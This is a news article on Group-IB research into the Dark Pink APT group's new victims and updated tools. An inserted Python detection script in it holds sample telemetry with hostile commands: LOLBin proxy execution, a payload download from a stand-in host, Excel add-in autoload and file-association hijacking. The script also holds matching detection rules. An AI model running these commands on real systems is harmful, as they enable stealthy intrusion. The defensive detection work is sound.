Group-IB finds Dark Pink APT group operations may be larger than first assumed, uses modified kill chain

Group-IB Threat Intelligence identified that the Dark Pink APT group attacked five more previously unidentified victims, implying that the reach of the hackers could be much broader than previously thought. Although most attacks occurred in the Asia-Pacific region, two organizations based in Europe were also on the victim list, highlighting that the hacker’s geography could also be broader than initially thought.

Also tracked under the name Saaiwc Group, the Dark Pink APT group keeps updating its existing toolset to remain undetected. Group-IB uncovered in January eight attacks on entities based in the Asia-Pacific region and one organization based in Europe, including one unsuccessful attack. 

“Dark Pink has continued to attack government, military, and non-profit organizations in the Asia-Pacific expanding its operations to Thailand and Brunei. Another victim, an educational sector organization, has also been identified in Belgium,” Andrey Polovinkin, malware analyst at Group-IB, wrote in a Wednesday blog post. “It is important to emphasize that Dark Pink has carried out at least two attacks since the beginning of 2023. The most recent attack known to Group-IB started in April, with the latest files being detected in May. It means that the group shows no signs of slowing down.”

Polovinkin said that the technical indicators obtained during threat intelligence gathering activities suggest that Dark Pink keeps updating its tools to slip undetected past defense mechanisms and remains highly active. 

The Group-IB team found that Dark Pink leveraged the functionalities of an MS Excel add-in to ensure the persistence of TelePowerBot within the infected system. In a recent attack, Dark Pink exfiltrated stolen data over HTTP using a service called ‘Webhook.’ Dark Pink most likely uses different LOLBin techniques to evade detection on infected machines. The team also disclosed that KamiKakaBot’s functionality has been split into two distinct parts: controlling devices and stealing sensitive data. In addition to distributing payloads through GitHub, the threat actors used the service TextBin[dot]net for the same purpose.

Polovinkin outlined in the post that on May 17, 2023, a file named ‘[Update] Counterdraft on the MoU on Rice Trade[dot]zip[dot]iso’ was uploaded to VirusTotal. “This ISO image is typical for Dark Pink and contains several items, including a signed file, a decoy document, and a malicious DLL. The infection chain corresponds to the last infection chain, as described in our previous report.” 

He added that the threat actor continues to use the MSBuild utility for launching KamiKakaBot (a tool designed to read and execute commands from a threat actor-controlled Telegram channel via Telegram bot) in the infection chain. The group has been using tools with the same functionalities as in previous attacks. Most of the changes seem to be intended to impede static analyses.

In the new version, KamiKakaBot’s functionality has been split into two distinct parts: controlling devices and stealing sensitive data, Polovinkin wrote. “As before, KamiKakaBot is loaded directly into the memory without being stored on the filesystem. The main part of KamiKakaBot has the same logic and has not changed from the initially discovered version. We examined several different samples, and in every case, the attackers added obfuscation to make static analyses more difficult,” he added.

While analyzing different variants of KamiKakaBot, “we noticed that the same functionality can be implemented in different ways.” 

When it comes to reconnaissance, Polovinkin said that the team identified multiple instances when Dark Pink used unconventional methods, which is not unusual for the group. “For instance, when launching the TelePowerBot, they modified the default file association and used SyncAppvPublishingServer[dot]vbs to initiate TelePowerBot. As regards the process of downloading archives, the files are downloaded using the ConfigSecurityPolicy utility, a component of Windows Defender used for managing settings and facilitating file transfers.”
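The techniques named above (Excel add-in persistence, ConfigSecurityPolicy downloads, SyncAppvPublishingServer[dot]vbs proxy execution, MSBuild launching the bot, and a modified default file association) all leave footprints in ordinary endpoint telemetry. The following detection sketch is an added example, not Group-IB's code or anything from its report: it runs a handful of rules over constructed Sysmon-like JSON-lines events. The field names (`kind`, `image`, `cmdline`, `key`, `value`, `data`) and every sample path, host and URL are assumptions made for this example; the Excel `Options\OPEN` registry value is the documented add-in autoload location, which the article itself does not name.

```python
"""Detection sketch for the LOLBin and persistence patterns described in the article.

Added example, not from Group-IB. Telemetry shape and sample values are constructed.
"""
import json
import re

# Constructed sample telemetry in a Sysmon-like JSON-lines shape (schema is an assumption).
SAMPLE_TELEMETRY = r"""
{"ts":"2023-05-17T09:01:02Z","host":"ws01","kind":"process","image":"C:\\Windows\\System32\\wscript.exe","cmdline":"wscript.exe C:\\Windows\\System32\\SyncAppvPublishingServer.vbs \"n;Start-Process -WindowStyle Hidden C:\\Users\\Public\\stage.ps1\"","parent":"explorer.exe"}
{"ts":"2023-05-17T09:01:05Z","host":"ws01","kind":"process","image":"C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe","cmdline":"ConfigSecurityPolicy.exe C:\\Users\\Public\\a.zip https://example.invalid/payload.zip","parent":"powershell.exe"}
{"ts":"2023-05-17T09:01:09Z","host":"ws01","kind":"process","image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe","cmdline":"MSBuild.exe C:\\Users\\Public\\Libraries\\build.xml","parent":"cmd.exe"}
{"ts":"2023-05-17T09:02:00Z","host":"ws01","kind":"registry","key":"HKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Options","value":"OPEN","data":"/R C:\\Users\\Public\\Libraries\\addin.xll"}
{"ts":"2023-05-17T09:02:10Z","host":"ws01","kind":"registry","key":"HKCU\\Software\\Classes\\txtfile\\shell\\open\\command","value":"","data":"wscript.exe C:\\Windows\\System32\\SyncAppvPublishingServer.vbs \"n;Start-Process C:\\Users\\Public\\stage.ps1\""}
{"ts":"2023-05-17T10:00:00Z","host":"build01","kind":"process","image":"C:\\Program Files\\Microsoft Visual Studio\\2022\\MSBuild\\Current\\Bin\\MSBuild.exe","cmdline":"MSBuild.exe C:\\src\\app\\app.csproj /t:Build","parent":"devenv.exe"}
{"ts":"2023-05-17T10:05:00Z","host":"ws02","kind":"process","image":"C:\\Windows\\System32\\wscript.exe","cmdline":"wscript.exe C:\\Windows\\System32\\SyncAppvPublishingServer.vbs","parent":"svchost.exe"}
"""

# Project files for a build tool normally live in source trees, not user-writable drop zones.
USER_WRITABLE = re.compile(r"(?i)\\(Users|ProgramData|Windows\\Temp)\\")
URL = re.compile(r"(?i)https?://")


def _hit(ev, rule, detail):
    """Normalise one finding so downstream tooling sees the same keys for every rule."""
    return {"rule": rule, "ts": ev.get("ts"), "host": ev.get("host"), "detail": detail}


def detect(lines):
    """Run the rules over JSON-lines telemetry and return a list of findings."""
    findings = []
    for raw in lines.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        ev = json.loads(raw)
        if ev.get("kind") == "process":
            image = ev.get("image", "").lower()
            cmd = ev.get("cmdline", "")
            lcmd = cmd.lower()
            # Defender's policy tool fetching from a URL is the download pattern the article describes.
            if image.endswith("configsecuritypolicy.exe") and URL.search(cmd):
                findings.append(_hit(ev, "configsecuritypolicy_download", cmd))
            # Legitimate invocations of this script do not pass a ';'-joined expression after its name.
            if "syncappvpublishingserver.vbs" in lcmd and ";" in lcmd.split(".vbs", 1)[1]:
                findings.append(_hit(ev, "syncappv_proxy_exec", cmd))
            # MSBuild compiling a "project" out of a user-writable path is a proxy-execution heuristic.
            if image.endswith("msbuild.exe") and USER_WRITABLE.search(cmd):
                findings.append(_hit(ev, "msbuild_user_path_project", cmd))
        elif ev.get("kind") == "registry":
            key = ev.get("key", "").lower()
            value = ev.get("value", "").lower()
            # Excel loads whatever OPEN, OPEN1, ... under Options points at: add-in persistence.
            if key.endswith("\\excel\\options") and re.fullmatch(r"open\d*", value):
                findings.append(_hit(ev, "excel_addin_autoload", ev.get("data", "")))
            # A per-user file association handler being rewritten matches the reported launch trick.
            if "\\software\\classes\\" in key and key.endswith("\\shell\\open\\command"):
                findings.append(_hit(ev, "file_association_modified", ev.get("data", "")))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_TELEMETRY):
        print(f"{f['ts']} {f['host']} {f['rule']}: {f['detail']}")
```

The two benign events (a developer's MSBuild run from a source tree and the script invoked without arguments by a system process) produce no findings, which is the check worth keeping when tuning these rules against real telemetry: each rule keys on the abuse-specific argument or location, not on the binary's mere presence.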

During the reconnaissance stage, Dark Pink executed simple PowerShell commands, presumably to check whether specific files could be found on the infected device, he added. “Although specific examples of these tools being used have not been discovered, based on our research into and experience with Dark Pink, we believe that all of these tools can be used for proxy execution or downloading malicious payloads.”  

Polovinkin concluded that the fact that two attacks were executed in 2023 indicates that Dark Pink remains active and poses an ongoing risk to organizations. “Evidence shows that the cybercriminals behind these attacks keep updating their existing tools in order to remain undetected. All of the above means that all organizations must always be watchful and take proactive steps to protect themselves. Keeping up with the latest threats and regularly updating security tools and measures is essential,” he added.

Last week, the U.S. and international cybersecurity agencies released a cybersecurity advisory highlighting malicious activity executed by a People’s Republic of China (PRC) state-sponsored hacker group, Volt Typhoon. The agencies have so far revealed that private sector partners have identified that this activity affects networks across U.S. critical infrastructure sectors and believe the group could apply the same techniques against these and other sectors worldwide.
